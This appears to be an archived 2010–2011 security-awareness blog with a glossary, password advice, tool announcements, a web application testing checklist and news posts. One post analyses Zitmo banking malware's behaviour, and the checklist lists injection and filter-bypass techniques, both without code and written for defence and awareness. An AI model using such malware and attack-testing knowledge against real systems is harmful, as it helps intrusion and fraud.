Security Is A Culture

Mr. Android 2011

2011-12-30T15:37:00.002+05:30

Security Terms in Simple English

2011-09-14T13:20:00.000+05:30

Security Terms in Simple English

Anti-Virus

A security program that can run on a computer or mobile deviceand protects you by identifying and stopping the spread of malware on yoursystem. Anti-virus cannot detect all malware, so even if it is active, yoursystem might still get infected. Anti-virus can also be used at theorganizational level. For example, email servers may have anti-virus integratedwith it to scan incoming or outgoing email. Sometimes anti-virus tools arecalled ‘anti-malware’, because these products are designed to defend againstvarious types of malicious software.

Drive-by Download

These attacks exploit vulnerabilities in your browser or it’splugins and helper applications when you simply surf to an attacker-controlledwebsite. Some computer attackers set up their own evil websites that aredesigned to automatically attack and exploit anyone that visits the website.Other attackers compromise trusted websites such as ecommerce sites and deploytheir exploit software there. Often these attacks occur without the victimsrealizing that they are under attack.

Exploit

Code that is designed to take advantage of a vulnerability. Anexploit is designed to give an attacker the ability to execute additional maliciousprograms on the compromised system or to provide unauthorized access toaffected data or application.

Firewall

A security program that filters inbound and outbound networkconnections. In some ways you can think of firewalls as a virtual traffic cop,determining which traffic can go through the firewall. Almost all computerstoday come with firewall software installed. In addition, firewalls can beimplemented as network devices to filter traffic that traverses through them.

Malware

Stands for ‘malicious software’. It is any type of code orprogram cyber attackers use to perform malicious actions. For example, malwarecould be used to capture all your keystrokes or use your computer to harmothers. Such malicious actions often occur without the user of the systemrealizing that it has been infected. Malware is a generic term and includes anytype of virus, worm, Trojan or other types of malicious code.

Patch

A patch is an update to a vulnerable program or system. A commonpractice to keep your computer and mobile devices secure is installing thelatest vendor’s patches in a timely fashion. Some vendors release patches on amonthly or quarterly basis. Therefore, having a computer that is unpatched foreven a few weeks could leave it vulnerable.

Phishing

Phishing is a social engineering technique where cyber attackersattempt to fool you into taking an action in response to an email. Phishing wasa term originally used to describe a specific attack scenario. Attackers wouldsend out emails pretending to be a trusted bank or financial institution, theirgoal was to fool victims into clicking on a link in the email. Once clicked,victims were taken to a website that pretended to be the bank, but was reallycreated and controlled by the attacker. If the victim attempted to loginthinking they were at their bank, their login and password would then be stolenby the attacker. The term has evolved and often means not just attacks designedto steal your password, but emails designed to send you to websites that hackinto your browser, or even emails with infected attachments.

Social Engineering

A psychological attack used by cyber attackers to deceive theirvictims into taking an action that will place the victim at risk. For example,cyber attackers may trick you into revealing your password or fool you intoinstalling malicious software on your computer. They often do this bypretending to be someone you know or trust, such as a bank, company or even afriend.

Spear Phishing

Spear phishing describes a type of phishing attacks that targetto specific victims. But instead of sending out an email to millions of emailaddresses, cyber attackers send out a very small number of crafted emails tovery specific individuals, usually all at the same organization. Because of thetargeted nature of this attack, spear phishing attacks are often harder todetect and usually more effective at fooling the victims.

Virus, Worm, Trojan

Different types of malware that are based on their capabilitiesand means of propagation. These technical distinctions between different typesof malware are becoming less relevant, because modern malware often combinescharacteristics from each of them in a single attack.

· Virus: A type of malware that spreads by infectingother files, rather than existing in a standalone manner. Viruses often, thoughnot always, usually spread through human interaction, such as opening aninfected file or application.)

· Worm: A type of malware that can propagateautomatically, typically without requiring any human interaction for it tospread. Worms often spread across networks, though can also infect systemsthrough other means, such as USB keys. An example of a worm is Conficker, whichinfected millions of computer systems starting in 2008 and is still activetoday.

· Trojan: A shortened form of “Trojan Horse”, thistype of malware appears to have a legitimate or at least benign use, but masksa hidden sinister function. For example, you may download and install a freescreensaver which actually works well as a screensaver. But that software couldalso be malicious, it will infect your computer once you install it.

Vulnerability

This is a weakness that attackers or their malicious programsmay be able to exploit. For example it can be a bug in a computer program or amisconfigured web server. An attacker or malware may be able to take advantageof the vulnerability to gain unauthorized access to the affected system.However, vulnerabilities can also be a weakness in people or organizationalprocesses.

9 Convenient Lies in Information Security

2011-09-09T11:15:00.000+05:30

Organizations sometimes “stretch the truth” regarding their ability to safeguard data, protect systems or offer other assurances related to information security. The crux of the problem is that implementing security is hard, as is explaining the effectiveness and roles of various controls. So we’re often left with promises or recommendations that can, at best, be seen as having an optimistic perspective on security.

Here are some of the statements that might often be considered lies, half-truths or idealistic simplifications…

Your data is secure because:

We use bank-level 128-bit AES encryption. Encryption by itself is insufficient, as there are numerous other ways in which data can be put at risk.

We are compliant with applicable industry regulations. The compliance status demonstrates that a set of practices is being followed, but doesn’t address all necessary security measures.

We have a security seal to demonstrate that we passed a security scan. Such scans are often limited in the weaknesses that they examine, potentially leaving the organization to numerous other attack vectors.

Protect yourself on-line by:

Not opening email attachments from suspicious senders. People often receive legitimate attachments from unknown senders, yet have no basis for determining what is suspicious.

Not clicking on links in email messages. People are often in the hurry or are multitasking, which makes it too tempting to click a link rather than attempting to re-type it.

Selecting a “strong” password. Opinions vary on what constitutes a “strong” password; also, by selecting one that’s hard to remember, people are more likely to reuse it across sites and applications, increasing the risk that one compromise might grant the attacker access to other resources.

Your data is safe with our employees because:

We conduct background checks. A “clean” record doesn’t guarantee that the person will exhibit ethical behavior in the future; also, many background checks are quite limited in their scope.

We provide mandatory security awareness training. Many training programs don’t affect employees’ security-related behavior; also, participating in the session doesn’t imply that the employee absorbed the material.

We have a security policy. Security policies seem to be rarely read and more rarely understood; also, the existence of security policies doesn’t imply that they are being followed.

When you see or hear the claims above, dig deeper to understand their meaning. When you hear security advice, ponder whether it is practical. If you are tempted to offer untruths to users or customers, make sure they are accurate and provide additional details where relevant and appropriate.

Tips for creating a secure password

2011-08-01T11:04:00.000+05:30

Tipsfor creating a secure password

· Include punctuation marks and/or numbers.

· Mix capital and lowercase letters.

· Include similar looking substitutions, such as the numberzero for the letter “O” or “$” for the letter “S”.

· Create a unique acronym.

· Include phoneticreplacements, such as “Luv 2 Laf” for “Love to Laugh”.

Things to avoid:

· Don’t use a password that is listed as an example ofhow to pick a good password.

· Don’t use a passwordthat contains personal information (name, birth date, etc.).

· Don’t use words oracronyms that can be found in a dictionary.

· Don’t use keyboardpatterns (asdf) or sequential numbers (1234).

· Don’t make your password all numbers, uppercaseletters or lowercase letters.

· Don’t use repeating characters (aa11).

Tips for keeping your password secure:

· Never tell your password to anyone (this includessignificant others, roommates, parrots, etc.).

· Never write your password down.

· Never send your password by email.

· Periodically test your current password and change it to anew one.

3 Reasons Why People Choose to Ignore Security Recommendations

2011-07-22T18:45:00.001+05:30

3 Reasons Why People Choose to IgnoreSecurity Recommendations

Theresearchers define information avoidance as “any behavior intended to preventor delay the acquisition of available but potentially unwanted information.”According to the paper, people may choose to avoid information because:

(a)the information may demand a change in beliefs,

(b)the information may demand undesired action, and

(c)the information itself or the decision to learn information may causeunpleasant emotions or diminish pleasant emotions.

Thesereasons for information avoidance are frequently present in situations wherethe organization conducted or commissioned an information security assessment.

Beliefs that might bechallenged by the assessment:

MyIT infrastructure is secure

Ican write code that’s free of bugs and vulnerabilities

Myanti-malware defenses are working well

Iam an unlikely target of computer attacks

Undesired actions that mightbe prompted by the assessment:

Securitypatches need to be applied throughout the environment

Thesoftware development process needs to be overhauled to incorporate security

Staffneeds to be trained to improve information security-related skills

Thebudget for information security needs to be increased

Thestrategy defined for the information security program needs to be revamped

Unpleasant emotionalsituations that might arise due to the assessment:

Ihave two “fight” with the management team to increase the security budget

Idon’t know how to secure information

Ispend money on the wrong information security products

Ilook bad in front of my colleagues

Therelevant importance of these concerns and the extent to which they come intoplay varies across situations. Yet, these psychological factors of informationavoidance explain not only why the findings of a security assessment may beignored, but also why organizations may be hesitant to conduct such anassessment in the first place. What can the organization do to avoid this? Canthe people conducting the assessment do anything to combat this tendency?

7 Inconvenient Truths for Information Security

2011-03-31T11:19:00.000+05:30

Information security policies and corresponding controls are often unrealistic. They don’t recognize how employees need to interact with computer systems and applications to get work done. The result is a set of safeguards that provide a false sense of security.

This problem will continue to grow due to consumerization of IT: the notion that employees increasingly employ powerful personal devices and services for work. This trend makes it easier for the employees to engage in practices that make their life and work more convenient while introducing security risks to their employer.

Corporate IT security departments need to recognize that employees:

• Use personal mobile devices and computers to interact with corporate data assets.

• Take advantage of file replication services,such as Dropbox,to make access to corporate data more easy

• Employ the same password for most corporate systems and, probably, personal on-line services.

• Write down passwords, PINs and other security codes on paper, in text files and email messages.

• Click on links and view attachments they receive through email and on-line social networks.

• Disable security software if they believe it slows them down.

• Don’t read security policies or, if they read them, don’t remember what was in them.

These are inconvenient truths that, if acknowledged by organizations as being common, can be incorporated into enterprise risk management discussions. Doing this will have strong implications for how IT security technologies and practices are configured and deployed.

What Is Advanced Persistent Threat (APT) ?

2011-03-16T01:54:00.000+05:30

The Advanced Persistent Threat (APT) is a sophisticated and organized cyber attack to access and steal information from compromised computers.

• Advanced means the adversary can operate in the full spectrum of computer intrusion. They can use the most pedestrian publicly available exploit against a well-known vulnerability, or they can elevate their game to research new vulnerabilities and develop custom exploits, depending on the target's posture.

• Persistent means the adversary is formally tasked to accomplish a mission. They are not opportunistic intruders. Like an intelligence unit they receive directives and work to satisfy their masters. Persistent does not necessarily mean they need to constantly execute malicious code on victim computers. Rather, they maintain the level of interaction needed to execute their objectives.

• Threat means the adversary is not a piece of mindless code. This point is crucial. Some people throw around the term "threat" with reference to malware. If malware had no human attached to it (someone to control the victim, read the stolen data, etc.), then most malware would be of little worry (as long as it didn't degrade or deny data). Rather, the adversary here is a threat because it is organized and funded and motivated. Some people speak of multiple "groups" consisting of dedicated "crews" with various missions.

Looking at the target list, we can perceive several potential objectives. Most likely, the APT supports:

• Political objectives that include continuing to suppress its own population in the name of "stability."

• Economic objectives that rely on stealing intellectual property from victims. Such IP can be cloned and sold, studied and underbid in competitive dealings, or fused with local research to produce new products and services more cheaply than the victims.

• Technical objectives that further their ability to accomplish their mission. These include gaining access to source code for further exploit development, or learning how defenses work in order to better evade or disrupt them. Most worringly is the thought that intruders could make changes to improve their position and weaken the victim.

•Military objectives that include identifying weaknesses that allow inferior military forces to defeat superior military forces. The Report on Chinese Government Sponsored Cyber Activities addresses issues like these.

Patriot is a 'Host IDS' for Windows

2011-02-27T09:39:00.000+05:30

Patriot is a 'Host IDS' tool which allows real time monitoring of

changes in Windows systems and Network attacks.

Patriot monitors:
Changes in Registry keys: Indicating whether any sensitive key
(autorun, internet explorer settings...) is altered.
New files in 'Startup' directories
New Users in the System
New Services installed
Changes in the hosts file
New scheduled jobs
Alteration of the integrity of Internet Explorer: (New BHOs,configuration changes, new toolbars)
Changes in ARP table (Prevention of MITM attacks)
Installation of new Drivers
New Netbios shares
TCP/IP Defense (New open ports, new connections made by processes,PortScan detection...)
Files in critical directories (New executables, new DLLs...)
New hidden windows (cmd.exe / Internet Explorer using OLE objects)
Netbios connections to the System
ARP Watch (New hosts in your network)
NIDS (Detect anomalous network traffic based on editable rules)

http://www.security-projects.com/?Patriot_NG

Improve Your Information Security Resume

2011-01-31T08:55:00.000+05:30

When you craft a resume to pursue an information security job, you are expected to list past responsibilities. The goal is usually to catch the attention of the recruiter or hiring manager and be invited for an interview. Describing your role in a way that helps your resume stand out is hard, but I have a suggestion for a way to tackle this challenge.

The most common mistake I’ve seen on resumes is the candidate merely listing the tasks he or she performed at an earlier job, such as:

•Wrote and maintained information security policies
•Supported the perimeter firewall, updating its rules when requested
•Managed anti-virus deployment for the enterprise

This isn’t all that bad… The task list allows the reader to understand what the candidate might be capable of. The problem is that this listing doesn’t stand out.

The solution? Make sure that every bullet point on your resume answers the question “So What?” That means including not only the text that describes what you were working on, but actually stating what you accomplished. The goal is to have the reader read your accomplishments and exclaim, “Wow! I want this person to do the same for me!”

Answering the implied “So What” question is hard. As you can see, the sample resume excerpt above doesn’t come even close to succeeding at this. The following listing is an improvement:

•Created and fine-tuned security policies, which allowed the organization to pass a regulatory audit. The documentation was succinct, making it easier for the employees to read it and follow its guidance.

•Managed the corporate firewall, improving the response time to implement changes by 50% over the course of the year. Optimized the existing rule set to decrease its length by 25%, making error-free maintenance easier.

•Centralized the management of endpoint anti-virus software, improving the time to respond to a malware infection by 70%. Wrote and deployed a script to validate that anti-virus software is installed on all workstations.

The text is a bit wordy and can use some tweaking. But the idea is that now the reader understands what benefits your tasks provided to your employer. Each bullet point provides an answer to the “So What?” question.

As you look at your current activities, consider whether you can point to any specific accomplishments. If you cannot, check whether there are other, more valuable tasks that you can focus on. Also, examine the extent to which the work you do contributes towards meeting your employer’s business goals.

Moreover, begin collecting metrics that not only provide your organization feedback regarding the effectiveness of its security program, but also help you collect the data you can use to illustrate your success on a resume

[Public Shadowserver] The Conficker Working Group Lessons Learned Document

2011-01-25T10:29:00.000+05:30

The Conficker Working Group Lessons Learned Document

Starting in late 2008, and continuing through June of 2010, a coalition of security researchers worked to resist an Internet borne attack carried out by malicious software known as Conficker. This coalition became known as “The Conficker Working Group”,

and seemed to be successful in a number of ways, not the least of which was unprecedented cooperation between organizations and individuals around the world, in both the public and private sectors.

In 2009, The Department of Homeland Security funded a project to develop and produce a “Lessons Learned” document that could serve as a permanent record of the events surrounding the creation and operation of the working group so that it could be used as an exemplar upon which similar groups in the future could build. This is the document.

The Rendon Group conducted the research independently, and although a number of members of the Conficker Working Group were interviewed, and provided information to the authors, the report is the sole work product of the Rendon Group. The views and

conclusions are not necessarily those of the Conficker Working Group, or any of its official or unofficial members. Nonetheless the Core Committee of the Conficker Working Group believes the report has substantial value and is pleased to provide access to

the Rendon document via the Conficker Working Group Website

http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf

The 12 information security principles for information security practitioners

2011-01-23T13:08:00.000+05:30

The 12 Principles

The 12 information security principles for information security practitioners are outlined under three main categories – support the business, defend the business, and promote responsible security behaviour – with an objective and detailed description for each principle:

https://www.isc2.org/PressReleaseDetails.aspx?id=7012

Computer Monitoring Tools

2010-10-07T04:03:00.000+05:30

As security professionals we all know when our computers are trying to tell us that there is something wrong. We also have our own techniques for poking around "under the hood" looking for trouble before it gets out of hand. Like car enthusiasts, we know what each rattle and noise means and we take steps to correct the problem early. But what about our parents and extended family members who don't have the same skills? Like the temperature gauge or "check engine" light in your car, how does a typical user know that something is wrong?
Most newer operating systems have a system health and monitoring capability. For example, in Windows 7 you do this:

Log on as a local administrator on your computer, click Start, and then click Performance and Information Tools.
Under Advanced Tools, select Generate a system health report.

And in Windows XP you take these steps:

Log on as a local administrator on your computer, click Start, and then click Help and Support.
Under the Pick a task, click Use Tools to view your computer information and diagnose problems.
In the Task pane, click My Computer Information, and then click View the status of my system hardware and software.

Recognizing phishing and online scams

2010-10-06T11:38:00.000+05:30

Recognizing phishing and online scams. Which is an interesting discussion. For example, would phishers still bother if no one clicked and freely entered their credit card and personal information? Would 419 scammers bother if no one responded to their messages? Since there is a profit motive behind the miscreants actions if there were a diminishing return, or the actual possibility or prosecution, would we continue to see so many of their emails and web sites? Philosophical questions aside, in oder to reduce the harm of scammer and phishers the people receiving the bait need to be able to recognize the messages as such and not respond or click.

Don't click or respond to the following:

If the message does not appear authentic, it probably isn't.
If it sounds too good to be true, it is.
Do the content of the message appear in search engine results?
If you hover your mouse over the link does your browser or security software silently scream at you?
Seeing silly typos, formatting, or grammatical errors a professional would not make.
If the message asks you to send your information to them, rather than the other way around.
If you don't have an account with the company supposedly sending the email!

Here are some useful links:

http://www.microsoft.com/protect/fraud/phishing/symptoms.aspx
http://www.us-cert.gov/reading_room/emailscams_0905.pdf
http://www.gongol.com/howto/recognizephishing/
http://www.surfnetkids.com/safety/how_to_recognize_phishing-21760.htm

Cyber Security Awareness - Securing the Family PC

2010-10-05T23:31:00.000+05:30

So today let's look at some common sense advice about the family computer. Yes, we all know the mantra about keeping the anti-virus software updated and the system patched (we'll talk more about that in a few days) but what else should we be doing? Some of the things that I recommend for the family PCs I work on include:

Keep all computers in full view (no hidden machines, no illusion of privacy)
Document computer details in writing (serial number, software, receipts, BIOS password, etc.) and keep the documentation in a fireproof box or safe
Use an uninterruptable power supply (UPS) for PCs, laptops have their own built-in UPS - the battery
Keep all of the hardware and software manuals, plus any software CDs/DVDs in one place that is easy to find
Use a cable lock to keep intruders from stealing the computer should there be a break-in
Throw a towel over the webcam (better: unplug the webcam)
Unless it needs to always be on, consider turning it off when not in use
Keep plenty of room around the PC so that air can flow through to cool it

Zeus In The Mobile (Zitmo): Online Banking’s Two Factor Authentication Defeated

2010-09-28T22:42:00.000+05:30

During the weekend, in our monitoring of the Zeus botnet, my colleague Kyle Yang stumbled upon an unexpected payload: a brand new mobile malware piece we named SymbOS/Zitmo.A!tr (Zitmo standing for “Zeus In The MObile”), likely aimed at intercepting confirmation SMS sent by banks to their customers. This also caught the eye of s21sec with a nice analysis you should read.

Basically, the ZeuS network initiated some social engineering operations (via injection of HTML forms in the victims’ browser) to get the phone number and phone model of its infected victims. Based on that info, it sends an SMS with a link to the appropriate version of the malicious package (a Symbian package for Symbian phones, a BlackBerry Jar for BlackBerry phones etc).

This malicious package is still under investigation, but given the context, it is logical to believe it is aimed at defeating SMS-based two-factor authentication that most banks implement today to confirm transfers of funds initiated online by their end users, and that currently impedes the plunging of infected users’ online accounts by Zeus masters (Note: although it was possible before, with man-in-the-middle attacks, it required the victim to initiate a financial transfer in the first place).

On the technical side, this malware is not altogether that much ‘unexpected’ because, since SymbOS/Yxes, we always said somebody would use web servers to distribute platform-specific malware to victims. Yet, it is the first time we acknowledge the technique to be used by a real gang.

So far, we have seen that:
» the Symbian version is correctly signed, using the Express Signed program, once more. Symbian has been notified, but meanwhile, please beware this certificate hasn’t been revoked yet:

Serial Number: 61:f1:00:01:00:23:5b:c2:79:43:80:40:5e:52

C=AZ, ST=Baku, L=Baku, O=Mobil Secway, OU=certificate 1.00,

OU=Symbian Signed ContentID, CN=Mobil Secway» the malware creates its own malicious database on the phone, where it stores all information it steals (contact first and last names for instance, phone numbers) and needs. This database is named NumbersDB.db, and contains 3 tables:
» tbl_contact with 4 columns: index, name, descr, pb_contact_id.
» tbl_phone_number with 2 columns: contact_id, phone_number
» and tbl_history with 6 columns: event_id, pn_id, date, description, contact_info, contact_id.

The malware searches those tables using standard SQL queries.
» the malware sends SMS messages. In particular, it sends a message to a phone number located in the United Kingdom to notify that the malware has been successfully installed (”App installed ok”).

"27/09/2010","12:09","Short message","Outgoing","App installed ok","+44778xxxxxxx"

(NOT SENT - OFFLINE)Additionally, as explained by s21sec, the malware seems to be able to answer to a few commands such as ’set admin’, which might be particularly dangerous: anyone sending a “set admin” SMS to your infected phone may be able to take control of it. We’re of course investigating this, as well as the rest.

Worst U.S. military security breach ever

2010-09-07T13:55:00.000+05:30

A malware-laden flash drive inserted in a laptop at a U.S. military base in the Middle East in 2008 led to the "most significant breach of" the nation's military computers ever, according to a new magazine article by a top defense official.

The malware uploaded itself to the U.S. Central Command network and spread undetected on classified and unclassified computers creating a "digital beachhead, from which data could be transferred to servers under foreign control," William J. Lynn III, U.S. deputy secretary of defense, wrote in his essay in the September/October issue of Foreign Affairs.

"It was a network administrator's worst fear: a rogue program operating silently, poised to deliver operational plans into the hands of an unknown adversary," he wrote. This previously classified incident was the most significant breach of U.S. military computers ever, and it served as an important wake-up call. The Pentagon's operation to counter the attack, known as Operation Buckshot Yankee, marked a turning point in U.S. cyberdefense strategy."

Read more: http://news.cnet.com/8301-27080_3-20014732-245.html#ixzz0ypX371xv

Epic -A Browser Made For Indians By Indians

2010-08-09T20:31:00.000+05:30

Epic -A Browser Made For Indians By Indians

Meet Epic, Your New Best Friend.The first-ever web browser for India,The world’s only antivirus browser.Yeah it’s true EPIC Web browser which is developed by and indian company called Hidden Reflex,and these guys are really making waves across the web Epic is Powered by the open-source Mozilla platform

http://www.epicbrowser.com/

httpry-A specialized packet sniffer designed for displaying and logging HTTP traffic.

2010-07-30T11:20:00.000+05:30

httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications.

What can you do with it? Here's a few ideas:
•See what users on your network are requesting online
•Check for proper server configuration (or improper, as the case may be)
•Research patterns in HTTP usage
•Watch for dangerous downloaded files
•Verify the enforcement of HTTP policy on your network
•Extract HTTP statistics out of saved capture files
•It's just plain fun to watch in realtime

Download:http://dumpsterventures.com/jason/httpry/

Application Security Checklists

2010-07-29T11:32:00.000+05:30

This checklist is a helpful reference when performing a web application security test. It is not a complete list though - there are often application-specific vulnerabilities and subtle issues that this does not cover.

Authentication
Logging in with an invalid user name does not reveal whether the user exists
Accounts are locked after a number of failed logins
An attacker cannot reset the lockout (e.g. by removing cookies)
Can't easily lockout an account to cause a denial of service
After login a redirect is issued, to prevent refresh attacks
Both "change password" and "logout" functions are provided
User is informed of last login time
Change password requires provision of old password
Passwords are proactively checked for strength
Password is never revealed (e.g. in the source of change password)

Session Management
Session tokens are at least 128-bit
Session tokens are unpredictable
A new session is allocated at login (i.e. session fixation is prevented)
Logout invalidates the session token on the server
Cookie has "secure" and "httponly" options set and is non-persistent
Sessions have an inactivity timeout
Sessions have an absolute timeout

Injection Attacks
Cross-site scripting
HTTP response splitting
SQL injection
LIKE pattern injection
LDAP injection
XPATH injection
Mail header injection
Directory traversal
Null-byte injection
Shell script / batch injection
Server-side script injection (PHP, Perl, etc.)
XML injection
Try to bypass filters using over-long utf-8 encodings
Try to bypass filters using wide-ASCII, or other Unicode equivalents

Content Checks
No script or CSS tags reference resources on other servers
No script or CSS tags on a page that can be accessed over HTTPS use URLs beginning http://
Use of eval, document.write, innerHTML, etc. does not cause XSS
Comments in files do not reveal sensitive information
Frames/iframes, if used, have frame spoofing protection
autocomplete=off is set on all forms asking for personal information
Private IP addresses

Server Side Script Behaviour
Arbitrary redirection
Arbitrary message inclusion
File upload features restrict uploaded content to prevent compromise
JavaScript Hijacking
Scripts that cause write actions require POST with a CSRF token
Scripts that act as an open proxy or mail relay
Exponential format accepted
Server compromise by uploading XML that sources a stylesheet
Source code disclosure through scripts that allow read access to files

Authorisation
All protected resources check for a valid session
All protected resources check for user permissions (forced browsing)
Parameter tampering does not allow access to others' data
Page-to-page flow is correctly enforced where required
Form POST targets perform the same authorisation as form views

Miscellaneous
cache-control: private or stronger is used on sensitive pages
All client-side validation is repeated on the server
Site supports HTTPS, and sensitive pages forbid HTTP access
All pages are displayed with status and address bars
All URLs are expected from a customer's point of view
No "Mixture of secure and insecure content" warnings

Server Configuration
There are no "orphaned" files (exist on the web server, but not linked)
No backup versions of files are accessible (may reveal source code)
No common insecure scripts (e.g. snoop servlet) are accessible
Error messages do not provide overly-detailed information

Special Cases
Dynamic login questions: question cannot be changed by the user
Application forms: restarting a transaction doesn't leak information
Smoke & mirrors: generated emails are appropriately protected
Domain auth: domain accounts cannot be locked out from the Internet
Forgotten password: understand any information leaked or risks created

SSL Client Certificates
Does login check user name matches certificate?
Can you lock out an account without holding the certificate?
Is certificate required for every request?
Does it check the certificate matches the session ID?
Can you login using a self-signed certificate?
Are test/pre-prod certificates separated from live?

Nested Web Service
Is the WSDL file accessible?
Does access to the web service require a web session?
Does it check the web session user matches the WS user?
Also, most of this checklist also applies to the web service.

Further, Very good article on Web Application Security Checklist:
http://www.enterpriseitplanet.com/security/features/article.php/2214631/Web-Application-Security-Checklist.htm

Various Security Checklists for your reference:
http://iase.disa.mil/stigs/checklist/

2010-07-14T15:54:00.000+05:30

NEW PROPOSED Top 7 Essential Log Reports

Top Log Report Candidate 1. Authentication and Authorization Reports
a. Login Failures and Successes
b. Attempts to gain unauthorized access through existing accounts
c. Privileged account access (success, failure)
d. VPN Authentication and other remote access (success, failure)
e. Please add more reports you find useful!

Top Log Report Candidate 2. Change Reports
a. Addition/Changes/Deletions to Users, Groups and Services
b. Change to configurations
c. Application installs and Updates
d. Please add more reports you find useful!

Top Log Report Candidate 3. Network Activity Reports [used to be called “Suspicious or Unauthorized Network Traffic Patterns” in the old Top 5 list]
a. Top Internal Systems Connecting Through Firewall // Summary of Outbound Connections
b. Network Services Transiting A Firewall
c. Top Largest File Transfers Through the Firewall
d. Internal Systems Using Many Different Protocols/Ports
e. Top Internal Systems With NIDS Alerts
f. Proxy Report on File Uploads
g. Please add more reports you find useful!

Top Log Report Candidate 4. Resource Access Reports
a. File
i. Failed File or Resource Access Attempts
b. Database
i. Top Database Users
ii. Summary of Query Types
iii. SELECT Data Volume
iv. All Users Executing INSERT/DELETE Commands
v. Database Backups
c. Email
i. Top Internal Email Addresses by Volume of Messages
ii. Top Attachment Types with Sizes
iii. Top Internal Systems Sending Spam // Top Internal Systems Sending Email NOT Through Mail Server
c. Please add more reports you find useful!

Top Log Report Candidate 5. Malware Activity Reports
a. Top systems with anti-malware events
b. Detect-only events from anti-malware tools (“leave-alones”)
c. Anti-virus protection failures by type
d. Internal malware connections (all sources)
e. Please add more reports you find useful!

Top Log Report Candidate 6. “Various FAIL”
a. Critical Errors
b. Backup failures
c. Capacity / Limit Exhaustion
d. System and Application Starts, Shutdowns and Restarts
e. Please add more reports you find useful!

Top Log Report Candidate 7. Analytic Reports [Mostly Using “Never Before Seen” (NBS) aka “NEW Type/Object” Analysis]
a. NEW (NBS) IDS/IPS Alert Types
b. NEW (NBS) Log Entry Types
c. NEW (NBS) Users Authentication Success
d. NEW (NBS) Internal Systems Connecting Through Firewall
e. NEW (NBS) Ports Accessed
f. NEW (NBS) HTTP Request Types
g. NEW (NBS) Query Types on Database
h. Please add more NBS or other analytic reports you find useful!

So, please help this project by commenting via whatever means!!!
BTW, I think I perused all the previous effor5ts to distill log reports (such as this one), but feel free to point me to such things as well.
Finally, if you are a SIEM or log management vendor, please consider supporting the resulting reports in your products – after they are finalized by the community and released by SANS.

GARTNER: COMPANIES SHOULDN'T BOTHER BANNING FACEBOOK, SOCIAL

2010-06-23T21:13:00.000+05:30

NATIONAL HARBOR, Md. -- According to a Gartner Inc. social media security expert, banning Facebook, and other social networking services like LinkedIn and Twitter, is an exercise in futility. To
boot, securing social media in the enterprise is not a responsibilitythat should fall to information security teams.
Tuesday at Gartner's Security and Risk Management Summit, research director Andrew Walls told attendees that although infosec pros may worry that social networking will lead to uncontrolled malware
outbreaks, phishing, breaches of confidentiality and trade secrets, and even damage to the corporate reputation, trying to take control of, or even block its use is akin to monitoring employees' home phone
calls and rifling through their postal mail.

Honey Pot -HoneyBOT v1.7 released!

2010-06-01T17:54:00.000+05:30

Atomic Software Solutions is offering a Windows based honeypot solution available as a free.

Whitelist feature allows users to configure HoneyBOT to ignore trusted computers.

Upgraded FTP service allows file uploads after administrator account is breached.

Screenshots

http://www.atomicsoftwaresolutions.com/download.php

Metasploitable-VM Image

2010-05-31T19:54:00.000+05:30

One of the questions that we often hear is "What systems can i use to test against?" Based on this, we thought it would be a good idea throw together an exploitable VM that you can use for testing purposes.
Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.

You can use most VMware products to run it, and you'll want to make sure it's configured for Host-only networking unless it's in your lab - no need to throw another vulnerable machine on the corporate network. It's configured in non-persistent-disk mode, so you can simply reset it if you accidentally 'rm -rf' it.

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

IDA Pro

2010-05-03T16:33:00.000+05:30

IDA Pro is a Windows or Linux hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all. Just grab an evaluation version if you want a test drive. An executive summary is provided for the non-technical user.

Evaluation version,: http://www.hex-rays.com/idapro/idadown.htm

Responder™ Professional

2010-05-03T15:40:00.000+05:30

The ultimate in Windows™ physical memory and automated malware analysis all integrated into one application for ease of use, streamlined workflow, and rapid results. The Professional platform is designed for Incident Responders, Malware Analysts, and Computer Forensic Investigators who require rapid results. Responder Professional provides powerful memory forensics and malware identification with Digital DNA™. Malware analysis includes automated code disassembly, behavioral profiling reporting, pattern searching, code labeling, and control flow graphing. This is a huge step forward for the information security and computer forensic communities. Finally, these long-awaited capabilities are available to complement enterprise security best practices in the areas of host intrusion detection, computer forensics and security assessments,

https://www.hbgary.com/products-services/

WinAPIOverride32:an advanced api monitoring software.

2010-04-28T19:18:00.000+05:30

WinAPIOverride32 is an advanced api monitoring software.You can monitor and/or override any function of a process. This can be done for API functions or executable internal functions.It tries to fill the gap between classical API monitoring softwares and debuggers.

It can break targeted application before or after a function call, allowing memory or registers changes; and it can directly call functions of the targeted application.

Main differences between other API monitoring softwares :

- You can define filters on parameters or function result
- You can define filters on dll to discard calls from windows system dll

- You can hook functions inside the target process not only API

- You can hook asm functions with parameters passed through registers

- You can hook hardware and software exceptions
- Double and float results are logged
- You can easily override any API or any process internal function
- You can break process before or/and after function call to change memory or registers

- You can call functions which are inside the remote processes

- Can hook COM OLE and ActiveX interfaces
- User types (enum, struct and union) and user defines are supported
- All is is done like modules : you can log or override independently for any function
- Open Source
- A library is provided for developpers who intend to build their one hooking software

http://jacquelin.potier.free.fr/winapioverride32/

RTIR -A premiere Open Source incident handling system.

2010-04-26T13:19:00.000+05:30

RTIR is the premiere Open Source incident handling system. We worked with over a dozen CERT and CSIRT teams to build a world-class incident handling system. RTIR helps you handle the ever-increasing volume incident reports. RTIR lets you tie multiple incident reports to specific incidents. RTIR makes it easy to launch investigations to work with law enforcement, network providers and other partners to get to the bottom of each incident and to track it through to a successful resolution.

It's easy to integrate RTIR into your existing systems and workflow. With open source code, a rich API and a vibrant community, RTIR can be tied into many external systems with only a few lines of configuration or a few minutes of programming. If you're using a publicly available product as part of your incident handling workflow, someone has probably already integrated it with RTIR

Download From:

http://www.bestpractical.com/rtir/download.html

Google Criticized for 'Buzz' Privacy Faults

2010-04-19T09:17:00.000+05:30

Google has announced it will ask all users to reconfirm their preferred privacy settings on its social networking site 'Buzz'. It follows a controversial launch in which many believed, correctly or otherwise, that their privacy had been compromised.

